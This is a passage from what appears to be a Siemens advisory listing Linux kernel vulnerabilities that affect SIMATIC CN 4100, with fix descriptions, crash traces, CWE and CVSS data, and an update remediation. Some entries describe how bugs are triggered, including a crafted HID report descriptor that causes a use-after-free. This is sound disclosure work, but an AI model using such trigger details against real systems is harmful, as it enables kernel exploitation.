multiple of the t->physical_block_size value. However, by finding the chunk_sectors value in bytes, we may overflow the unsigned int which holds chunk_sectors, so change the check to be based on sectors. View CVE Details Affected Products Siemens SIMATIC Vendor: Siemens Product Version: SIMATIC CN 4100 Product Status: known_affected Remediations Vendor fix Update to V5.0 or later version https://support.industry.siemens.com/cs/ww/en/view/109814144/ Relevant CWE: CWE-674 Uncontrolled Recursion Metrics CVSS Version Base Score Base Severity Vector String 3.1 5.5 MEDIUM CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H CVE-2025-39798 In the Linux kernel, the following vulnerability has been resolved: NFS: Fix the setting of capabilities when automounting a new filesystem Capabilities cannot be inherited when we cross into a new filesystem. They need to be reset to the minimal defaults, and then probed for again. View CVE Details Affected Products Siemens SIMATIC Vendor: Siemens Product Version: SIMATIC CN 4100 Product Status: known_affected Remediations Vendor fix Update to V5.0 or later version https://support.industry.siemens.com/cs/ww/en/view/109814144/ Relevant CWE: CWE-273 Improper Check for Dropped Privileges Metrics CVSS Version Base Score Base Severity Vector String 3.1 5.5 MEDIUM CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H CVE-2025-39800 In the Linux kernel, the following vulnerability has been resolved: btrfs: abort transaction on unexpected eb generation at btrfs_copy_root() If we find an unexpected generation for the extent buffer we are cloning at btrfs_copy_root(), we just WARN_ON() and don't error out and abort the transaction, meaning we allow to persist metadata with an unexpected generation. Instead of warning only, abort the transaction and return -EUCLEAN. View CVE Details Affected Products Siemens SIMATIC Vendor: Siemens Product Version: SIMATIC CN 4100 Product Status: known_affected Remediations Vendor fix Update to V5.0 or later version https://support.industry.siemens.com/cs/ww/en/view/109814144/ Relevant CWE: CWE-20 Improper Input Validation Metrics CVSS Version Base Score Base Severity Vector String 3.1 5.5 MEDIUM CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H CVE-2025-39801 In the Linux kernel, the following vulnerability has been resolved: usb: dwc3: Remove WARN_ON for device endpoint command timeouts This commit addresses a rarely observed endpoint command timeout which causes kernel panic due to warn when 'panic_on_warn' is enabled and unnecessary call trace prints when 'panic_on_warn' is disabled. It is seen during fast software-controlled connect/disconnect testcases. The following is one such endpoint command timeout that we observed: 1. Connect ======= ->dwc3_thread_interrupt ->dwc3_ep0_interrupt ->configfs_composite_setup ->composite_setup ->usb_ep_queue ->dwc3_gadget_ep0_queue ->__dwc3_gadget_ep0_queue ->__dwc3_ep0_do_control_data ->dwc3_send_gadget_ep_cmd 2. Disconnect ========== ->dwc3_thread_interrupt ->dwc3_gadget_disconnect_interrupt ->dwc3_ep0_reset_state ->dwc3_ep0_end_control_data ->dwc3_send_gadget_ep_cmd In the issue scenario, in Exynos platforms, we observed that control transfers for the previous connect have not yet been completed and end transfer command sent as a part of the disconnect sequence and processing of USB_ENDPOINT_HALT feature request from the host timeout. This maybe an expected scenario since the controller is processing EP commands sent as a part of the previous connect. It maybe better to remove WARN_ON in all places where device endpoint commands are sent to avoid unnecessary kernel panic due to warn. View CVE Details Affected Products Siemens SIMATIC Vendor: Siemens Product Version: SIMATIC CN 4100 Product Status: known_affected Remediations Vendor fix Update to V5.0 or later version https://support.industry.siemens.com/cs/ww/en/view/109814144/ Relevant CWE: CWE-20 Improper Input Validation Metrics CVSS Version Base Score Base Severity Vector String 3.1 5.5 MEDIUM CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H CVE-2025-39806 In the Linux kernel, the following vulnerability has been resolved: HID: multitouch: fix slab out-of-bounds access in mt_report_fixup() A malicious HID device can trigger a slab out-of-bounds during mt_report_fixup() by passing in report descriptor smaller than 607 bytes. mt_report_fixup() attempts to patch byte offset 607 of the descriptor with 0x25 by first checking if byte offset 607 is 0x15 however it lacks bounds checks to verify if the descriptor is big enough before conducting this check. Fix this bug by ensuring the descriptor size is at least 608 bytes before accessing it. Below is the KASAN splat after the out of bounds access happens: [ 13.671954] ================================================================== [ 13.672667] BUG: KASAN: slab-out-of-bounds in mt_report_fixup+0x103/0x110 [ 13.673297] Read of size 1 at addr ffff888103df39df by task kworker/0:1/10 [ 13.673297] [ 13.673297] CPU: 0 UID: 0 PID: 10 Comm: kworker/0:1 Not tainted 6.15.0-00005-gec5d573d83f4-dirty #3 [ 13.673297] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.16.2-debian-1.16.2-1 04/04 [ 13.673297] Call Trace: [ 13.673297] [ 13.673297] dump_stack_lvl+0x5f/0x80 [ 13.673297] print_report+0xd1/0x660 [ 13.673297] kasan_report+0xe5/0x120 [ 13.673297] __asan_report_load1_noabort+0x18/0x20 [ 13.673297] mt_report_fixup+0x103/0x110 [ 13.673297] hid_open_report+0x1ef/0x810 [ 13.673297] mt_probe+0x422/0x960 [ 13.673297] hid_device_probe+0x2e2/0x6f0 [ 13.673297] really_probe+0x1c6/0x6b0 [ 13.673297] __driver_probe_device+0x24f/0x310 [ 13.673297] driver_probe_device+0x4e/0x220 [ 13.673297] __device_attach_driver+0x169/0x320 [ 13.673297] bus_for_each_drv+0x11d/0x1b0 [ 13.673297] __device_attach+0x1b8/0x3e0 [ 13.673297] device_initial_probe+0x12/0x20 [ 13.673297] bus_probe_device+0x13d/0x180 [ 13.673297] device_add+0xe3a/0x1670 [ 13.673297] hid_add_device+0x31d/0xa40 [...] View CVE Details Affected Products Siemens SIMATIC Vendor: Siemens Product Version: SIMATIC CN 4100 Product Status: known_affected Remediations Vendor fix Update to V5.0 or later version https://support.industry.siemens.com/cs/ww/en/view/109814144/ Relevant CWE: CWE-20 Improper Input Validation Metrics CVSS Version Base Score Base Severity Vector String 3.1 7 HIGH CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H CVE-2025-39808 In the Linux kernel, the following vulnerability has been resolved: HID: hid-ntrig: fix unable to handle page fault in ntrig_report_version() in ntrig_report_version(), hdev parameter passed from hid_probe(). sending descriptor to /dev/uhid can make hdev->dev.parent->parent to null if hdev->dev.parent->parent is null, usb_dev has invalid address(0xffffffffffffff58) that hid_to_usb_dev(hdev) returned when usb_rcvctrlpipe() use usb_dev,it trigger page fault error for address(0xffffffffffffff58) add null check logic to ntrig_report_version() before calling hid_to_usb_dev() View CVE Details Affected Products Siemens SIMATIC Vendor: Siemens Product Version: SIMATIC CN 4100 Product Status: known_affected Remediations Vendor fix Update to V5.0 or later version https://support.industry.siemens.com/cs/ww/en/view/109814144/ Relevant CWE: CWE-20 Improper Input Validation Metrics CVSS Version Base Score Base Severity Vector String 3.1 5.5 MEDIUM CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H CVE-2025-39812 In the Linux kernel, the following vulnerability has been resolved: sctp: initialize more fields in sctp_v6_from_sk() syzbot found that sin6_scope_id was not properly initialized, leading to undefined behavior. Clear sin6_scope_id and sin6_flowinfo. BUG: KMSAN: uninit-value in __sctp_v6_cmp_addr+0x887/0x8c0 net/sctp/ipv6.c:649 __sctp_v6_cmp_addr+0x887/0x8c0 net/sctp/ipv6.c:649 sctp_inet6_cmp_addr+0x4f2/0x510 net/sctp/ipv6.c:983 sctp_bind_addr_conflict+0x22a/0x3b0 net/sctp/bind_addr.c:390 sctp_get_port_local+0x21eb/0x2440 net/sctp/socket.c:8452 sctp_get_port net/sctp/socket.c:8523 [inline] sctp_listen_start net/sctp/socket.c:8567 [inline] sctp_inet_listen+0x710/0xfd0 net/sctp/socket.c:8636 __sys_listen_socket net/socket.c:1912 [inline] __sys_listen net/socket.c:1927 [inline] __do_sys_listen net/socket.c:1932 [inline] __se_sys_listen net/socket.c:1930 [inline] __x64_sys_listen+0x343/0x4c0 net/socket.c:1930 x64_sys_call+0x271d/0x3e20 arch/x86/include/generated/asm/syscalls_64.h:51 do_syscall_x64 arch/x86/entry/syscall_64.c:63 [inline] do_syscall_64+0xd9/0x210 arch/x86/entry/syscall_64.c:94 entry_SYSCALL_64_after_hwframe+0x77/0x7f Local variable addr.i.i created at: sctp_get_port net/sctp/socket.c:8515 [inline] sctp_listen_start net/sctp/socket.c:8567 [inline] sctp_inet_listen+0x650/0xfd0 net/sctp/socket.c:8636 __sys_listen_socket net/socket.c:1912 [inline] __sys_listen net/socket.c:1927 [inline] __do_sys_listen net/socket.c:1932 [inline] __se_sys_listen net/socket.c:1930 [inline] __x64_sys_listen+0x343/0x4c0 net/socket.c:1930 View CVE Details Affected Products Siemens SIMATIC Vendor: Siemens Product Version: SIMATIC CN 4100 Product Status: known_affected Remediations Vendor fix Update to V5.0 or later version https://support.industry.siemens.com/cs/ww/en/view/109814144/ Relevant CWE: CWE-20 Improper Input Validation Metrics CVSS Version Base Score Base Severity Vector String 3.1 5.5 MEDIUM CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H CVE-2025-39813 In the Linux kernel, the following vulnerability has been resolved: ftrace: Fix potential warning in trace_printk_seq during ftrace_dump When calling ftrace_dump_one() concurrently with reading trace_pipe, a WARN_ON_ONCE() in trace_printk_seq() can be triggered due to a race condition. The issue occurs because: CPU0 (ftrace_dump) CPU1 (reader) echo z > /proc/sysrq-trigger !trace_empty(&iter) trace_iterator_reset(&iter) <- len = size = 0 cat /sys/kernel/tracing/trace_pipe trace_find_next_entry_inc(&iter) __find_next_entry ring_buffer_empty_cpu <- all empty return NULL trace_printk_seq(&iter.seq) WARN_ON_ONCE(s->seq.len >= s->seq.size) In the context between trace_empty() and trace_find_next_entry_inc() during ftrace_dump, the ring buffer data was consumed by other readers. This caused trace_find_next_entry_inc to return NULL, failing to populate `iter.seq`. At this point, due to the prior trace_iterator_reset, both `iter.seq.len` and `iter.seq.size` were set to 0. Since they are equal, the WARN_ON_ONCE condition is triggered. Move the trace_printk_seq() into the if block that checks to make sure the return value of trace_find_next_entry_inc() is non-NULL in ftrace_dump_one(), ensuring the 'iter.seq' is properly populated before subsequent operations. View CVE Details Affected Products Siemens SIMATIC Vendor: Siemens Product Version: SIMATIC CN 4100 Product Status: known_affected Remediations Vendor fix Update to V5.0 or later version https://support.industry.siemens.com/cs/ww/en/view/109814144/ Relevant CWE: CWE-20 Improper Input Validation Metrics CVSS Version Base Score Base Severity Vector String 3.1 5.5 MEDIUM CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H CVE-2025-39817 In the Linux kernel, the following vulnerability has been resolved: efivarfs: Fix slab-out-of-bounds in efivarfs_d_compare Observed on kernel 6.6 (present on master as well): BUG: KASAN: slab-out-of-bounds in memcmp+0x98/0xd0 Call trace: kasan_check_range+0xe8/0x190 __asan_loadN+0x1c/0x28 memcmp+0x98/0xd0 efivarfs_d_compare+0x68/0xd8 __d_lookup_rcu_op_compare+0x178/0x218 __d_lookup_rcu+0x1f8/0x228 d_alloc_parallel+0x150/0x648 lookup_open.isra.0+0x5f0/0x8d0 open_last_lookups+0x264/0x828 path_openat+0x130/0x3f8 do_filp_open+0x114/0x248 do_sys_openat2+0x340/0x3c0 __arm64_sys_openat+0x120/0x1a0 If dentry->d_name.len < EFI_VARIABLE_GUID_LEN , 'guid' can become negative, leadings to oob. The issue can be triggered by parallel lookups using invalid filename: T1 T2 lookup_open ->lookup simple_lookup d_add // invalid dentry is added to hash list lookup_open d_alloc_parallel __d_lookup_rcu __d_lookup_rcu_op_compare hlist_bl_for_each_entry_rcu // invalid dentry can be retrieved ->d_compare efivarfs_d_compare // oob Fix it by checking 'guid' before cmp. View CVE Details Affected Products Siemens SIMATIC Vendor: Siemens Product Version: SIMATIC CN 4100 Product Status: known_affected Remediations Vendor fix Update to V5.0 or later version https://support.industry.siemens.com/cs/ww/en/view/109814144/ Relevant CWE: CWE-20 Improper Input Validation Metrics CVSS Version Base Score Base Severity Vector String 3.1 7 HIGH CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H CVE-2025-39819 In the Linux kernel, the following vulnerability has been resolved: fs/smb: Fix inconsistent refcnt update A possible inconsistent update of refcount was identified in `smb2_compound_op`. Such inconsistent update could lead to possible resource leaks. Why it is a possible bug: 1. In the comment section of the function, it clearly states that the reference to `cfile` should be dropped after calling this function. 2. Every control flow path would check and drop the reference to `cfile`, except the patched one. 3. Existing callers would not handle refcount update of `cfile` if -ENOMEM is returned. To fix the bug, an extra goto label "out" is added, to make sure that the cleanup logic would always be respected. As the problem is caused by the allocation failure of `vars`, the cleanup logic between label "finished" and "out" can be safely ignored. According to the definition of function `is_replayable_error`, the error code of "-ENOMEM" is not recoverable. Therefore, the replay logic also gets ignored. View CVE Details Affected Products Siemens SIMATIC Vendor: Siemens Product Version: SIMATIC CN 4100 Product Status: known_affected Remediations Vendor fix Update to V5.0 or later version https://support.industry.siemens.com/cs/ww/en/view/109814144/ Relevant CWE: CWE-20 Improper Input Validation Metrics CVSS Version Base Score Base Severity Vector String 3.1 5.5 MEDIUM CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H CVE-2025-39823 In the Linux kernel, the following vulnerability has been resolved: KVM: x86: use array_index_nospec with indices that come from guest min and dest_id are guest-controlled indices. Using array_index_nospec() after the bounds checks clamps these values to mitigate speculative execution side-channels. View CVE Details Affected Products Siemens SIMATIC Vendor: Siemens Product Version: SIMATIC CN 4100 Product Status: known_affected Remediations Vendor fix Update to V5.0 or later version https://support.industry.siemens.com/cs/ww/en/view/109814144/ Relevant CWE: CWE-20 Improper Input Validation Metrics CVSS Version Base Score Base Severity Vector String 3.1 7 HIGH CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H CVE-2025-39824 In the Linux kernel, the following vulnerability has been resolved: HID: asus: fix UAF via HID_CLAIMED_INPUT validation After hid_hw_start() is called hidinput_connect() will eventually be called to set up the device with the input layer since the HID_CONNECT_DEFAULT connect mask is used. During hidinput_connect() all input and output reports are processed and corresponding hid_inputs are allocated and configured via hidinput_configure_usages(). This process involves slot tagging report fields and configuring usages by setting relevant bits in the capability bitmaps. However it is possible that the capability bitmaps are not set at all leading to the subsequent hidinput_has_been_populated() check to fail leading to the freeing of the hid_input and the underlying input device. This becomes problematic because a malicious HID device like a ASUS ROG N-Key keyboard can trigger the above scenario via a specially crafted descriptor which then leads to a user-after-free when the name of the freed input device is written to later on after hid_hw_start(). Below, report 93 intentionally utilises the HID_UP_UNDEFINED Usage Page which is skipped during usage configuration, leading to the frees. 0x05, 0x0D, // Usage Page (Digitizer) 0x09, 0x05, // Usage (Touch Pad) 0xA1, 0x01, // Collection (Application) 0x85, 0x0D, // Report ID (13) 0x06, 0x00, 0xFF, // Usage Page (Vendor Defined 0xFF00) 0x09, 0xC5, // Usage (0xC5) 0x15, 0x00, // Logical Minimum (0) 0x26, 0xFF, 0x00, // Logical Maximum (255) 0x75, 0x08, // Report Size (8) 0x95, 0x04, // Report Count (4) 0xB1, 0x02, // Feature (Data,Var,Abs) 0x85, 0x5D, // Report ID (93) 0x06, 0x00, 0x00, // Usage Page (Undefined) 0x09, 0x01, // Usage (0x01) 0x15, 0x00, // Logical Minimum (0) 0x26, 0xFF, 0x00, // Logical Maximum (255) 0x75, 0x08, // Report Size (8) 0x95, 0x1B, // Report Count (27) 0x81, 0x02, // Input (Data,Var,Abs) 0xC0, // End Collection Below is the KASAN splat after triggering the UAF: [ 21.672709] ================================================================== [ 21.673700] BUG: KASAN: slab-use-after-free in asus_probe+0xeeb/0xf80 [ 21.673700] Write of size 8 at addr ffff88810a0ac000 by task kworker/1:2/54 [ 21.673700] [ 21.673700] CPU: 1 UID: 0 PID: 54 Comm: kworker/1:2 Not tainted 6.16.0-rc4-g9773391cf4dd-dirty #36 PREEMPT(voluntary) [ 21.673700] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.16.2-debian-1.16.2-1 04/01/2014 [ 21.673700] Call Trace: [ 21.673700] [ 21.673700] dump_stack_lvl+0x5f/0x80 [ 21.673700] print_report+0xd1/0x660 [ 21.673700] kasan_report+0xe5/0x120 [ 21.673700] __asan_report_store8_noabort+0x1b/0x30 [ 21.673700] asus_probe+0xeeb/0xf80 [ 21.673700] hid_device_probe+0x2ee/0x700 [ 21.673700] really_probe+0x1c6/0x6b0 [ 21.673700] __driver_probe_device+0x24f/0x310 [ 21.673700] driver_probe_device+0x4e/0x220 [...] [ 21.673700] [ 21.673700] Allocated by task 54: [ 21.673700] kasan_save_stack+0x3d/0x60 [ 21.673700] kasan_save_track+0x18/0x40 [ 21.673700] kasan_save_alloc_info+0x3b/0x50 [ 21.673700] __kasan_kmalloc+0x9c/0xa0 [ 21.673700] __kmalloc_cache_noprof+0x139/0x340 [ 21.673700] input_allocate_device+0x44/0x370 [ 21.673700] hidinput_connect+0xcb6/0x2630 [ 21.673700] hid_connect+0xf74/0x1d60 [ 21.673700] hid_hw_start+0x8c/0x110 [ 21.673700] asus_probe+0x5a3/0xf80 [ 21.673700] hid_device_probe+0x2ee/0x700 [ 21.673700] really_probe+0x1c6/0x6b0 [ 21.673700] __driver_probe_device+0x24f/0x310 [ 21.673700] driver_probe_device+0x4e/0x220 [...] [ 21.673700] [ 21.673700] Freed by task 54: [ 21.673700] kasan_save_stack+0x3d/0x60 [ 21.673700] kasan_save_track+0x18/0x40 [ 21.673700] kasan_save_free_info+0x3f/0x60 [ 21.673700] __kasan_slab_free+0x3c/0x50 [ 21.673700] kfre ---truncated--- View CVE Details Affected Products Siemens SIMATIC Vendor: Siemens Product Version: SIMATIC CN 4100 Product Status: known_affected Remediations Vendor fix Update to V5.0 or later version https://support.industry.siemens.com/cs/ww/en/view/109814144/ Relevant CWE: CWE-20 Improper Input Validation Metrics CVSS Version Base Score Base Severity Vector String 3.1 7 HIGH CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H CVE-2025-39825 In the Linux kernel, the following vulnerability has been resolved: smb: client: fix race with concurrent opens in rename(2) Besides sending the rename request to the server, the rename process also involves closing any deferred close, waiting for outstanding I/O to complete as well as marking all existing open handles as deleted to prevent them from deferring closes, which increases the race window for potential concurrent opens on the target file. Fix this by unhashing the dentry in advance to prevent any concurrent opens on the target. View CVE Details Affected Products Siemens SIMATIC Vendor: Siemens Product Version: SIMATIC CN 4100 Product Status: known_affected Remediations Vendor fix Update to V5.0 or later version https://support.industry.siemens.com/cs/ww/en/view/109814144/ Relevant CWE: CWE-20 Improper Input Validation Metrics CVSS Version Base Score Base Severity Vector String 3.1 7 HIGH CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H CVE-2025-39826 In the Linux kernel, the following vulnerability has been resolved: net: rose: convert 'use' field to refcount_t The 'use' field in struct rose_neigh is used as a reference counter but lacks atomicity. This can lead to race conditions where a rose_neigh structure is freed while still being referenced by other code paths. For example, when rose_neigh->use becomes zero during an ioctl operation via rose_rt_ioctl(), the structure may be removed while its timer is still active, potentially causing use-after-free issues. This patch changes the type of 'use' from unsigned short to refcount_t and updates all code paths to use rose_neigh_hold() and rose_neigh_put() which operate reference counts atomically. View CVE Details Affected Products Siemens SIMATIC Vendor: Siemens Product Version: SIMATIC CN 4100 Product Status: known_affected Remediations Vendor fix Update to V5.0 or later version https://support.industry.siemens.com/cs/ww/en/view/109814144/ Relevant CWE: CWE-20 Improper Input Validation Metrics CVSS Version Base Score Base Severity Vector String 3.1 5.5 MEDIUM CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H CVE-2025-39827 In the Linux kernel, the following vulnerability has been resolved: net: rose: include node references in rose_neigh refcount Current implementation maintains two separate reference counting mechanisms: the 'count' field in struct rose_neigh tracks references from rose_node structures, while the 'use' field (now refcount_t) tracks references from rose_sock. This patch merges these two reference counting systems using 'use' field for proper reference management. Specifically, this patch adds incrementing and decrementing of rose_neigh->use when rose_neigh->count is incremented or decremented. This patch also modifies rose_rt_free(), rose_rt_device_down() and rose_clear_route() to properly release references to rose_neigh objects before freeing a rose_node through rose_remove_node(). These changes ensure rose_neigh structures are properly freed only when all references, including those from rose_node structures, are released. As a result, this resolves a slab-use-after-free issue reported by Syzbot. View CVE Details Affected Products Siemens SIMATIC Vendor: Siemens Product Version: SIMATIC CN 4100 Product Status: known_affected Remediations Vendor fix Update to V5.0 or later version https://support.industry.siemens.com/cs/ww/en/view/109814144/ Relevant CWE: CWE-20 Improper Input Validation Metrics CVSS Version Base Score Base Severity Vector String 3.1 5.5 MEDIUM CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H CVE-2025-39828 In the Linux kernel, the following vulnerability has been resolved: atm: atmtcp: Prevent arbitrary write in atmtcp_recv_control(). syzbot reported the splat below. [0] When atmtcp_v_open() or atmtcp_v_close() is called via connect() or close(), atmtcp_send_control() is called to send an in-kernel special message. The message has ATMTCP_HDR_MAGIC in atmtcp_control.hdr.length. Also, a pointer of struct atm_vcc is set to atmtcp_control.vcc. The notable thing is struct atmtcp_control is uAPI but has a space for an in-kernel pointer. struct atmtcp_control { struct atmtcp_hdr hdr; /* must be first */ ... atm_kptr_t vcc; /* both directions */ ... } __ATM_API_ALIGN; typedef struct { unsigned char _[8]; } __ATM_API_ALIGN atm_kptr_t; The special message is processed in atmtcp_recv_control() called from atmtcp_c_send(). atmtcp_c_send() is vcc->dev->ops->send() and called from 2 paths: 1. .ndo_start_xmit() (vcc->send() == atm_send_aal0()) 2. vcc_sendmsg() The problem is sendmsg() does not validate the message length and userspace can abuse atmtcp_recv_control() to overwrite any kptr by atmtcp_control. Let's add a new ->pre_send() hook to validate messages from sendmsg(). [0]: Oops: general protection fault, probably for non-canonical address 0xdffffc00200000ab: 0000 [#1] SMP KASAN PTI KASAN: probably user-memory-access in range [0x0000000100000558-0x000000010000055f] CPU: 0 UID: 0 PID: 5865 Comm: syz-executor331 Not tainted 6.17.0-rc1-syzkaller-00215-gbab3ce404553 #0 PREEMPT(full) Hardware name: Google Google Compute Engine/Google Compute Engine, BIOS Google 07/12/2025 RIP: 0010:atmtcp_recv_control drivers/atm/atmtcp.c:93 [inline] RIP: 0010:atmtcp_c_send+0x1da/0x950 drivers/atm/atmtcp.c:297 Code: 4d 8d 75 1a 4c 89 f0 48 c1 e8 03 42 0f b6 04 20 84 c0 0f 85 15 06 00 00 41 0f b7 1e 4d 8d b7 60 05 00 00 4c 89 f0 48 c1 e8 03 <42> 0f b6 04 20 84 c0 0f 85 13 06 00 00 66 41 89 1e 4d 8d 75 1c 4c RSP: 0018:ffffc90003f5f810 EFLAGS: 00010203 RAX: 00000000200000ab RBX: 0000000000000000 RCX: 0000000000000000 RDX: ffff88802a510000 RSI: 00000000ffffffff RDI: ffff888030a6068c RBP: ffff88802699fb40 R08: ffff888030a606eb R09: 1ffff1100614c0dd R10: dffffc0000000000 R11: ffffffff8718fc40 R12: dffffc0000000000 R13: ffff888030a60680 R14: 000000010000055f R15: 00000000ffffffff FS: 00007f8d7e9236c0(0000) GS:ffff888125c1c000(0000) knlGS:0000000000000000 CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 CR2: 000000000045ad50 CR3: 0000000075bde000 CR4: 00000000003526f0 Call Trace: vcc_sendmsg+0xa10/0xc60 net/atm/common.c:645 sock_sendmsg_nosec net/socket.c:714 [inline] __sock_sendmsg+0x219/0x270 net/socket.c:729 ____sys_sendmsg+0x505/0x830 net/socket.c:2614 ___sys_sendmsg+0x21f/0x2a0 net/socket.c:2668 __sys_sendmsg net/socket.c:2700 [inline] __do_sys_sendmsg net/socket.c:2705 [inline] __se_sys_sendmsg net/socket.c:2703 [inline] __x64_sys_sendmsg+0x19b/0x260 net/socket.c:2703 do_syscall_x64 arch/x86/entry/syscall_64.c:63 [inline] do_syscall_64+0xfa/0x3b0 arch/x86/entry/syscall_64.c:94 entry_SYSCALL_64_after_hwframe+0x77/0x7f RIP: 0033:0x7f8d7e96a4a9 Code: 28 00 00 00 75 05 48 83 c4 28 c3 e8 51 18 00 00 90 48 89 f8 48 89 f7 48 89 d6 48 89 ca 4d 89 c2 4d 89 c8 4c 8b 4c 24 08 0f 05 <48> 3d 01 f0 ff ff 73 01 c3 48 c7 c1 b0 ff ff ff f7 d8 64 89 01 48 RSP: 002b:00007f8d7e923198 EFLAGS: 00000246 ORIG_RAX: 000000000000002e RAX: ffffffffffffffda RBX: 00007f8d7e9f4308 RCX: 00007f8d7e96a4a9 RDX: 0000000000000000 RSI: 0000200000000240 RDI: 0000000000000005 RBP: 00007f8d7e9f4300 R08: 65732f636f72702f R09: 65732f636f72702f R10: 65732f636f72702f R11: 0000000000000246 R12: 00007f8d7e9c10ac R13: 00007f8d7e9231a0 R14: 0000200000000200 R15: 0000200000000250 Modules linked in: View CVE Details Affected Products Siemens SIMATIC Vendor: Siemens Product Version: SIMATIC CN 4100 Product Status: known_affected Remediations Vendor fix Update to V5.0 or later version https://support.industry.siemens.com/cs/ww/en/view/109814144/ Relevant CWE: CWE-20 Improper Input Validation Metrics CVSS Version Base Score Base Severity Vector String 3.1 7 HIGH CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H CVE-2025-39835 In the Linux kernel, the following vulnerability has been resolved: xfs: do not propagate ENODATA disk errors into xattr code ENODATA (aka ENOATTR) has a very specific meaning in the xfs xattr code; namely, that the requested attribute name could not be found. However, a medium error from disk may also return ENODATA. At best, this medium error may escape to userspace as "attribute not found" when in fact it's an IO (disk) error. At worst, we may oops in xfs_attr_leaf_get() when we do: error = xfs_attr_leaf_hasname(args, &bp); if (error == -ENOATTR) { xfs_trans_brelse(args->trans, bp); return error; } because an ENODATA/ENOATTR error from disk leaves us with a null bp, and the xfs_trans_brelse will then null-deref it. As discussed on the list, we really need to modify the lower level IO functions to trap all disk errors and ensure that we don't let unique errors like this leak up into higher xfs functions - many like this should be remapped to EIO. However, this patch directly addresses a reported bug in the xattr code, and should be safe to backport to stable kernels. A larger-scope patch to handle more unique errors at lower levels can follow later. (Note, prior to 07120f1abdff we did not oops, but we did return the wrong error code to userspace.) View CVE Details Affected Products Siemens SIMATIC Vendor: Siemens Product Version: SIMATIC CN 4100 Product Status: known_affected Remediations Vendor fix Update to V5.0 or later version https://support.industry.siemens.com/cs/ww/en/view/109814144/ Relevant CWE: CWE-20 Improper Input Validation Metrics CVSS Version Base Score Base Severity Vector String 3.1 5.5 MEDIUM CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H CVE-2025-39838 In the Linux kernel, the following vulnerability has been resolved: cifs: prevent NULL pointer dereference in UTF16 conversion There can be a NULL pointer dereference bug here. NULL is passed to __cifs_sfu_make_node without checks, which passes it unchecked to cifs_strndup_to_utf16, which in turn passes it to cifs_local_to_utf16_bytes where '*from' is dereferenced, causing a crash. This patch adds a check for NULL 'src' in cifs_strndup_to_utf16 and returns NULL early to prevent dereferencing NULL pointer. Found by Linux Verification Center (linuxtesting.org) with SVACE View CVE Details Affected Products Siemens SIMATIC Vendor: Siemens Product Version: SIMATIC CN 4100 Product Status: known_affected Remediations Vendor fix Update to V5.0 or later version https://support.industry.siemens.com/cs/ww/en/view/109814144/ Relevant CWE: CWE-20 Improper Input Validation Metrics CVSS Version Base Score Base Severity Vector String 3.1 7 HIGH CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H CVE-2025-39839 In the Linux kernel, the following vulnerability has been resolved: batman-adv: fix OOB read/write in network-coding decode batadv_nc_skb_decode_packet() trusts coded_len and checks only against skb->len. XOR starts at sizeof(struct batadv_unicast_packet), reducing payload headroom, and the source skb length is not verified, allowing an out-of-bounds read and a small out-of-bounds write. Validate that coded_len fits within the payload area of both destination and source sk_buffs before XORing. View CVE Details Affected Products Siemens SIMATIC Vendor: Siemens Product Version: SIMATIC CN 4100 Product Status: known_affected Remediations Vendor fix Update to V5.0 or later version https://support.industry.siemens.com/cs/ww/en/view/109814144/ Relevant CWE: CWE-20 Improper Input Validation Metrics CVSS Version Base Score Base Severity Vector String 3.1 5.5 MEDIUM CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H CVE-2025-39841 In the Linux kernel, the following vulnerability has been resolved: scsi: lpfc: Fix buffer free/clear order in deferred receive path Fix a use-after-free window by correcting the buffer release sequence in the deferred receive path. The code freed the RQ buffer first and only then cleared the context pointer under the lock. Concurrent paths (e.g., ABTS and the repost path) also inspect and release the same pointer under the lock, so the old order could lead to double-free/UAF. Note that the repost path already uses the correct pattern: detach the pointer under the lock, then free it after dropping the lock. The deferred path should do the same. View CVE Details Affected Products Siemens SIMATIC Vendor: Siemens Product Version: SIMATIC CN 4100 Product Status: known_affected Remediations Vendor fix Update to V5.0 or later version https://support.industry.siemens.com/cs/ww/en/view/109814144/ Relevant CWE: CWE-20 Improper Input Validation Metrics CVSS Version Base Score Base Severity Vector String 3.1 7.8 HIGH CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H CVE-2025-39842 In the Linux kernel, the following vulnerability has been resolved: ocfs2: prevent release journal inode after journal shutdown Before calling ocfs2_delete_osb(), ocfs2_journal_shutdown() has already been executed in ocfs2_dismount_volume(), so osb->journal must be NULL. Therefore, the following calltrace will inevitably fail when it reaches jbd2_journal_release_jbd_inode(). ocfs2_dismount_volume()-> ocfs2_delete_osb()-> ocfs2_free_slot_info()-> __ocfs2_free_slot_info()-> evict()-> ocfs2_evict_inode()-> ocfs2_clear_inode()-> jbd2_journal_release_jbd_inode(osb->journal->j_journal, Adding osb->journal checks will prevent null-ptr-deref during the above execution path. View CVE Details Affected Products Siemens SIMATIC Vendor: Siemens Product Version: SIMATIC CN 4100 Product Status: known_affected Remediations Vendor fix Update to V5.0 or later version 